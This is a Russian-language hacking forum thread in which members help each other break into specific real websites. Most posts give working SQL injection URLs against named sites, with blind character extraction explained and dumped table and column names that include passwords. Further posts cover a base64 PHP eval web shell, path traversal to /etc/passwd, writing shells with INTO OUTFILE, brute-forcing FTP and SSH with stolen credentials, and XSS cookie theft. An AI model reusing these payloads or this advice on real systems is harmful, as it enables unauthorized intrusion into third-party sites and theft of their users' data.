Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'"


Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,i f((@x:=(ascii(mid((select+group_concat(table_name) +from+information_schema.tables+where+table_name+l ike+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (64;128]


Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,i f((@x:=(ascii(mid((select+group_concat(table_name) +from+information_schema.tables+where+table_name+l ike+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (80;96]


Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,i f((@x:=(ascii(mid((select+group_concat(table_name) +from+information_schema.tables+where+table_name+l ike+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (84;88]


Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,i f((@x:=(ascii(mid((select+group_concat(table_name) +from+information_schema.tables+where+table_name+l ike+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+

Возвращает страницу 6. Код символа равен 85

Объясни мне детально вот эту часть запроса:


Code:
,1,1))))>128,if(@x>196,0,1),if(@x>64,5,6))

Посимвольно)

Cпасибо.

не уложилось в голове...

Давай примером , как мне оттуда достать второй символ?

,1,1(Почему 1,1 какой в этом смысловой нагруз?)))))>128(почму именно 128?),if(@x>196(Почему именно со 196 сравнение?),0,1(почему 0,1?)),if(@x>64,5,6(Тут тоже не понятно откудо взялось 64, что такое 5,6)))

M_script, зачем переменные? Можно и без них обойтись...

ReV0LVeR, синтаксис if такой:


Code:
if(условие,1,0)

Тоесть то же, что, например, на пхп выглядит так:


PHP:
if(условие)

return1;

else

return0;

Таким образом, если условие == true, то результат будет 1, если же нет - то false.

Покажу пример:


Code:
http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if(2=3-1,6,0),7,8,9,10,11--

Условие - то, что подчёркнуто и выделено, т.е. 2 = 3 - 1. Естественно, что это правда (true), и поэтому, в 6 колонку подставится значение 6. Если бы это была ложь (false) - вернулся бы 0, и, соответственно, страница бы не загрузилась.


Code:
http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if(1=2,6,0),7,8,9,10,11--

А дальше идёт посимвольный перебор значений. Об этом читай на ачате =)

[CODE]
Code:
http://divantvplus.ru/index.html?id=390 and ascii(substring((SELECT concat(sys_users.user_id,0x3a,sys_users.user_name, 0x3a,sys_users.super,0x3a,sys_users.admin,0x3a,sys _users.user_login,0x3a,sys_users.user_password) FROM divantvplus.sys_users LIMIT [B]1,1),16,1))

mailbrush said:
M_script
, зачем переменные? Можно и без них обойтись...


Для сокращения длины запроса. Потому что 4 различных состояния страницы, а не 2


PHP:
if(x>2) {

if(x>3) {

return4;

}

else {

return3;

}

}

else {

if(x>1) {

return2

}

else {

return1;

}

}

В последнее время много шелов на wordpress 3.1.1! Поделитесь способом!

Kuteke said:
В последнее время много шелов на wordpress 3.1.1! Поделитесь способом!


Где много?

ReV0LVeR said:
Почему 1,1 какой в этом смысловой нагруз?


Один символ, начиная с первого.

2,1 - один символ, начиная со второго.

1,2 - два символа, начиная с первого.


ReV0LVeR said:
почему именно 128?


Середина диапазона 0-255.


ReV0LVeR said:
Почему именно со 196 сравнение?


Середина диапазона 128-255. Это условие проверяется, если первое условие x>128 выполнено.


ReV0LVeR said:
Тут тоже не понятно откудо взялось 64


Середина диапазона 0-128. Это условие проверяется, если первое условие x>128 не выполнено.


ReV0LVeR said:
почему 0,1?




ReV0LVeR said:
что такое 5,6


Значения 0,1,5,6 попадая в поле 6 запроса дают различный вывод страницы.

Если выводится страница, соответсвующая 0, код символа находится в первом диапазоне 196-255

Если выводится страница, соответсвующая 1, код символа находится во втором диапазоне 128-196

Если выводится страница, соответсвующая 5, код символа находится в третьем диапазоне 64-128

Если выводится страница, соответсвующая 6, код символа находится в четвертом диапазоне 0-64

Найденный первым запросом диапазон так же делится на 4 части (в примере - 64-80, 80-96, 96-112, 112-128). Такое деление продолжается до тех пор, пока диапазон не будет ограничен одним числом.

Диапазон 0-255 я привел для примера, так как он универсальный. На практике все зависит от того, какое значение нужно получить.

Поделитесь способом заливки шела на WP 3.1.1! Попугай, в интернете

Kuteke said:
Поделитесь способом заливки шела на WP 3.1.1! Попугай, в интернете


Да способы не изменились в принципе - правка шаблонов, правка плагинов, загрузка файлов(не всегда прокатывает)

попугай said:
Да способы не изменились в принципе - правка шаблонов, правка плагинов, загрузка файлов(не всегда прокатывает)


Я, так понимаю, он просит зиродэй плоенты под вп 3.1.1, а не сам процесс заливки шелла ))

Tigger said:
Я, так понимаю, он просит зиродэй плоенты под вп 3.1.1, а не сам процесс заливки шелла ))


Да, да!

Kuteke said:
Да, да!



в паблике ничего серезного нету, разве что тока пассивка xss

баги надо искать в сторонных компонентах

как залить шелл через шаблон. на дле 8.5? и можно ли это сделать? в сет есть несколько вариантов как это сделать но пока ни один не помог

Это инклюд?


http://www.guitars.ru/01/info.php?z828'

FlaktW said:
Это инклюд?


Ну так даже в ошибке же написано о_0

http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../var/www/mstia/data/www/guitars.ru/01/info.php

Увы, но allow_url_include там off...

http://www.guitars.ru/01/info.php?data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRd KTsgPz4=

Вот, советую к прочтению: http://www.xakep.ru/post/49508/default.asp

Tigger said:
Ну так даже в ошибке же написано о_0
http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../var/www/mstia/data/www/guitars.ru/01/info.php


Почему /etc/passwd не выводится?

http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../etc/passwd%00

FlaktW said:
Почему /etc/passwd не выводится?
http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../etc/passwd%00


Null-байт там не нужен, ничего же не добавляеться.

/etc/passwd - не читает потому что там написано, что не разрешено выполнять инклюд данного файла "Operation not permitted".

Tigger said:
Null-байт там не нужен, ничего же не добавляеться.
/etc/passwd - не читает потому что там написано, что не разрешено выполнять инклюд данного файла "Operation not permitted".




../../../../../../../../../../../


почему именно столько диров + к ним еще документ рут?

ваще не могу понять как вычислить длину этих диров ../../

Lasteeck said:
почему именно столько диров + к ним еще документ рут?
ваще не могу понять как вычислить длину этих диров ../../


../ эта штука на сколько каталогов надо подняться наверх

например есть сайт

site.ru/article.php?list=1

и такой путь до article

/usr/www/site.com/article

надо подняться на 4 каталога вверх

Вообще почитай об иерархии файлов в nix системах

Tigger said:
Увы, но allow_url_include там off...


Зато там есть форум. Где твоя смекалка?

mailbrush said:
Зато там есть форум. Где твоя смекалка?


Я думал в этой теме на вопросы отвечают, а тут надо шелл на все сайты подряд заливать, да?

White Bear said:
../ эта штука на сколько каталогов надо подняться наверх
например есть сайт
site.ru/article.php?list=1
и такой путь до article
/usr/www/site.com/article
надо подняться на 4 каталога вверх
Вообще почитай об иерархии файлов в nix системах


почему тигра написал, 11 диров ввысь подняться, а там документ рут из 5 диров? не путай меня, я насколько знаю /../../../ наоборот на увеличение идет.

/../ - home

/../../ - home/http/

и так далее, но у тигры почему то не соответствие с рутом и количеством диров в ошибке, в чем подвох?

Ы. Ну ладно, кто понял, тот понял =)

Lasteeck said:
почему тигра написал, 11 диров ввысь подняться, а там документ рут из 5 диров? не путай меня, я насколько знаю /../../../ наоборот на увеличение идет.
/../ - home
/../../ - home/http/
и так далее, но у тигры почему то не соответствие с рутом и количеством диров в ошибке, в чем подвох?


Ну потому что мне впадлу было считать и подставлять точное кол-во для того чтобы проинклюдить начиная с диры которая идет с корня. Если директория идет от корня , т.е. ты имеешь полный путь, он же (/etc/passwd) то я могу не важно сколько подъемов вверх сделать, он их все пропустит, т.к. выше корня некуда и начнет читать с того который есть (/etc).

Чего-то я не понял что ты написал. "../" - поднятие наверх. "./" - текущий каталог.

В данном случае нету префикса, так что можно и без переходов вверх инклудить с корня =)

SQL Error

Got error 'empty (sub)expression' from regexp


Code:
$id = (int)$_GET["id"];
if(strlen($id) > 4){
header("Location: /list/");}

эт когда ставлью несуществующий ID. можно как-то развить?

rootmd said:
SQL Error
Got error 'empty (sub)expression' from regexp

Code:
$id = (int)$_GET["id"];
if(strlen($id) > 4){
header("Location: /list/");}

эт когда ставлью несуществующий ID. можно как-то развить?


Ничего, потому что там приведение к типу INT, пропускает только числовые значения.


mailbrush said:
В данном случае нету префикса, так что можно и без переходов вверх инклудить с корня =)


Зная, я же написал что RFI лишь не проходит по причине отсутствия флага allow_url_include. Я ответил на вопрос Ластика.

Уважаемые, посоветуйте что-нибудь под wp 2.3.3 ? (эксп или уязвимость какую)

Тут (https://antichat.live/showthread.php/p/1298124/) конкретно под 2.3.3 описываются уязвимости.

Вот вроде бы подходит под WP 2.3.3

http://www.exploit-db.com/exploits/10088/

http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-56028/Wordpress-Wordpress-2.3.3.html

foozzi said:
какие существуют уязвимости помимо php inc, sql inj, xxs
если можно напишите большую часть существующих



Top 10 уязвимостей по мнению OWASP.

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Ситуация в следующем залил шел в тмп через into outfile, в остальные папки нет прав (LOAD_FILE читал файлы и зависимости, не в одну диру нет прав, кроме тмп), админки нет, инклуда тоже, фантазия закончилась, что делать то?

Lijzer said:
Ситуация в следующем залил шел в тмп через into outfile, в остальные папки нет прав (LOAD_FILE читал файлы и зависимости, не в одну диру нет прав, кроме тмп), админки нет, инклуда тоже, фантазия закончилась, что делать то?


Сколько сайтов на сервере?

Один сайт, соседей нет.

Lijzer said:
Ситуация в следующем залил шел в тмп через into outfile, в остальные папки нет прав (LOAD_FILE читал файлы и зависимости, не в одну диру нет прав, кроме тмп), админки нет, инклуда тоже, фантазия закончилась, что делать то?


Посмотри в конфигах данные для доступа к БД и попробуй пробрутить FTP \ SSH с данным пассом, в качестве логина используй совй хацкерскую догадку (имя сайта, user(), логиг из конфига, root, admin, и т.д....)

есть ли софтина для перебора таблиц в mysql 4? если да то ткните плиз, sqlhelper умеет но оооочень медленно

foozzi said:
есть ли софтина для перебора таблиц в mysql 4? если да то ткните плиз, sqlhelper умеет но оооочень медленно


Я юзаю: Toolza от Pashkela

Есть еще: sqlmap, sqlninja.

Tigger said:
Я юзаю: Toolza от Pashkela
Есть еще: sqlmap, sqlninja.


на Toolza все сцыли убиты, скинь плиз в лс

Что поменять в конфиге PHP, чтобы при ошибках в скриптах они не логировались в error_log (который создается рядом с самим скриптом)? Нужно отключить только запись ошибок в файл.

ini_set("log_errors", "Off"); не помогает.

Возникла трабла со скулёй

Не получается найти вывод. автоматические средства бессильны


Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+or+1=1+UniOn +select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

У кого какие идеи ?

BigBear said:
Возникла трабла со скулёй
Не получается найти вывод. автоматические средства бессильны

Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+or+1=1+UniOn +select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

У кого какие идеи ?


Читай проведение SQL инъекций в Microsoft Access:

/thread50550.html

Читал, пробовал разные варианты


Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+from+MSysObjects

Не получается вывести диагностические ошибки о правильности или неправильности

Всем привет!

Подскажите, по какой причине может передаваться не вся кука?

Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.

add:

На сайте wordpress 3.1.3... xss в форуме(плагин для wp).

Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.

IMMORTAL_S, сам ответил на вопрос. HttpOnly

Да, уже погуглил.

Что-то еще можно сделать?.. как-то убрать этот флаг?

add:

нашел ява апплет... всем спасибо))

cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.

M_script said:
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.


спасибо, лови +

пока забил на куки... нашел sqlinj

В какую сторону раскручивать?


Code:
http://www.homesrochester.com/index.cfm?PageID=1

пробовал как mssql, не выходит

mix0x0 said:
В какую сторону раскручивать?

Code:
http://www.homesrochester.com/index.cfm?PageID=1

пробовал как mssql, не выходит


Крутить нужно как проведение SQL инъекций в Microsoft Access:

/thread50550.html

но навряд ли ты ее раскрутишь

2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут (https://antichat.live/showthread.php/t/7120/) и тут (https://rdot.org/forum/showthread.php?t=826)

там 100500 БД...

shell_c0de said:
2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут
тут (https://antichat.live/showthread.php/t/7120/)
и
тут (https://rdot.org/forum/showthread.php?t=826)
там 100500 БД...


Вы правы, там все легко выводится:

DB Name: hr

Table found: sysdiagrams

Table found: Process

Table found: MLSArea

Table found: ProcessStep

Table found: FileImport

Table found: User

Table found: Theme

Table found: MLSListingImage

Table found: Agent

Table found: MLSListing

Table found: Office

Table found: Table1

Table found: Table2

Table found: ContainerModule

Table found: ListingPriceHistory

Table found: PageContainer

Table found: Portlet

Table found: OpenHouse

Table found: PortletProperty

Table found: ModuleProperty

Table found: PropertyType

Table found: Page

Table found: FeaturedListing

Table found: UserSearch

Table found: FileImportColumn

Table found: ListingType

Table found: Document

Table found: MLSListingLink

Table found: WebLog

Table found: Container

Table found: OpenHouseTemp

Table found: Module

Table found: State

Table found: Website

hr.User

Column found: AddedByID

Column found: AddedDt

Column found: EmailAddress

Column found: FirstName

Column found: HomePhone

Column found: LastName

Column found: MobilePhone

Column found: Password

Column found: SysAdminFl

Column found: UpdatedByID

Column found: UpdatedDt

Column found: UserID

Column found: UserName

Column found: UserStatus

Column found: WorkPhone

От меня ++++++++ и большое thanks за науку.

2 вопроса:

1 - имеется сайт, в нем Возможно есть sql inj

пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница

как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?

2 - как определить mysql от mssql и oracle ? кроме символов комментариев?

foozzi said:
2 вопроса:
1 - имеется сайт, в нем
Возможно
есть sql inj
пишу в урл 49-1 возвращается 48 страница при написании
'
выводится пустая страница
как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?


1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет.

2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.

foozzi said:
как осуществить подсчет полей и дамп базы в таких условиях?


"id=48 order by 1" например так.

p.s.: давай ссылку. это тебе не фиши по факингу

foozzi said:
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?


MySQL


Code:
id=1+procedure+analyse()
id=1+and+concat_ws(1)=1
id=1+and+connection_id()=connection_id()

MSSQL


Code:
id=1+and+len(@@version)=len(@@version)
id=1+and+(@@TEXTSIZE>@@LANGID)

PostgerSQL


Code:
id=1+and+1=1::int
id=1+and+pg_backend_pid()=pg_backend_pid()
id=1+and+5432=inet_server_port()

Access


Code:
id=1+and+1=StrConv(1,1)
id=1+and+Sgn(1)=Sgn(1)

Oracle


Code:
id=1+and+to_char(22)=to_char(2)||to_char(2)
id=1+and+instr4(1,1,1,1)=1
id=1+and+rownum=rownum

Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1

M_script said:
"id=48 order by 1" например так.
p.s.: давай ссылку. это тебе не фиши по факингу


вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49

(практикуюсь)

foozzi said:
вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49
(практикуюсь)




Code:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -



Code:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -

вывод внизу

AlexV said:

Code:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -


Code:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -

вывод внизу


Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?

foozzi said:
Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?


http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64+--+

Сейчас видишь?

В админку все равно не попасть

http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg

знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней

ты пробелы удали из урла

http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64+--+

5.0.77-log:cms_it_db_01:cms_it_dba@localhost:redhat-linux-gnu

Какая здесь ветка, кто-нибудь может ответить?


http://www.riviera-home.ru/gallery1.php?city=-99999999'+order+by+10+--+

на этом сайте нашол пару xss _http://shock-world.com/

в полях регистрации email и name но они до ужаса бесполезные.

есть кто поможет дальше прокрутить ? потому что я пока ничего ненашол , но уверен есть там дырки

FlaktW said:
Какая здесь ветка, кто-нибудь может ответить?


3

Ваше сообщение слишком короткое. Оно должно быть не менее 4 символов.

Тогда ищи их, а с вопросами - сюда.

За тебя никто ничего делать не будет.

есть сайт с LFI, при чтении /proc/self/environ получается вот что:


???????????????????????????u????????????1????????? ?????????????????????????????????????????????????? ?????1???????????????????????????????????????????? ???????????????????????????????????8??????????e??? ?????????????????????????????????????????????????? ?????????????????????????????????????????????????? ???????????????????????????0???????????1?????????? ???u?????????????????????????????????????????????? ?????????????????????????????????????????????????? ?????????n???????????????????????????????????????? ????????????????????????4????????4???????????????? ????????????????????????????????????????0????????? ?????????????????????????p???????????????????????5 ????????????????????????u??????????????u?????????? ?????????0????????=???????????


/proc/self/cmdline


??????/??????????????????????????


link: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/cmdline%00

WTF?oO

[stranger], ссылка?

Есть xss, выполнить можно только


alert(String.fromCharCode(98,108,97,45,98,108,97))


Ну или просто


alert(/asd/)


Символы как:


',>,"


Фильтруются.

Пробовал по разному, и так:


img = new Image(); img.src = String.fromCharCode(...)+document.....


И просто даже все брал в String.fromCharCode.

Но все безуспешно. Помогите плиз, правильно составить запрос.

WTF?oO , файлы находящиеся за корнем отличаются от кодировки файлов находящимся в каталоге сайта т е файлы читаются в кодировке, отличной от их изначальной кодировки. Надо искать что то в пределах сайта/на другом сайте, если есть доступ:


Code:
http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../robots.txt%00ddd

Так же можно найти путь к логам, и послать в них данные в кодировке, в которой они читаются и выводятся.

XAMEHA said:
WTF?oO
, файлы находящиеся за корнем отличаются от кодировки файлов находящимся в каталоге сайта т е файлы читаются в кодировке, отличной от их изначальной кодировки.


Проблема только с чтением данных, которые могут быть изменены клиентом.


Code:
http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/status%00ddd

Проще в хостинге зарегаться и посмотреть где логи лежат.

M1lten, что именно не получается?

eval(String.fromCharCode(тут любой нужный JS-код))

Помогите разобраться вот с этой скулёй.


Code:
http://www.biogov.gc.ca/english/LinkSearch.asp?x=732&formAction=keywordsearch&txtSearchKeywords=13\

Мож есть статья как крутить при алертах

BigBear said:
Помогите разобраться вот с этой скулёй.

Code:
http://www.biogov.gc.ca/english/LinkSearch.asp?x=732&formAction=keywordsearch&txtSearchKeywords=13\

Мож есть статья как крутить при алертах


http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+order+by+15

FlaktW said:
http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+order+by+15


Пробовал. Вывода не нашёл.

Также пробовал через подзапрос


Code:
http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+and+1=1+union+select+1

Так же болт.

Бразы, кто в курсе нет каким макаром залить шелл через cnstats

KosoyRoman said:
Бразы, кто в курсе нет каким макаром залить шелл через cnstats


какая версия?

Фильтруется кавычка, как здесь это обойти. В интернете искал, но по этому вопросу ничего не нашел.

http://www.cityadm.magadan.ru/index.php?cstart=4'+order+by+1+--+&do=cat&category=kotirovka

?id=-512+UnIoN+AlL+sElEcT+1,2,'',4,5,6,7,8+INTO+OUTFILE +'/web3/vhosts/webhosting/news/php.php'--

выдает Bad Request

что можно сделать?

kroŧ said:
?id=-512+UnIoN+AlL+sElEcT+1,2,'',4,5,6,7,8+INTO+OUTFILE +'/web3/vhosts/webhosting/news/php.php'--
выдает Bad Request
что можно сделать?



сервер ругается, вероятнее на слово $_GET или систем, подставь разные слова/функции смотри что конкретно фильтрует

пробуй eval($_REQUEST['a']), ну или как то так, в основном именно они не попадают под фильтр

---

да и вообще нах юзать system?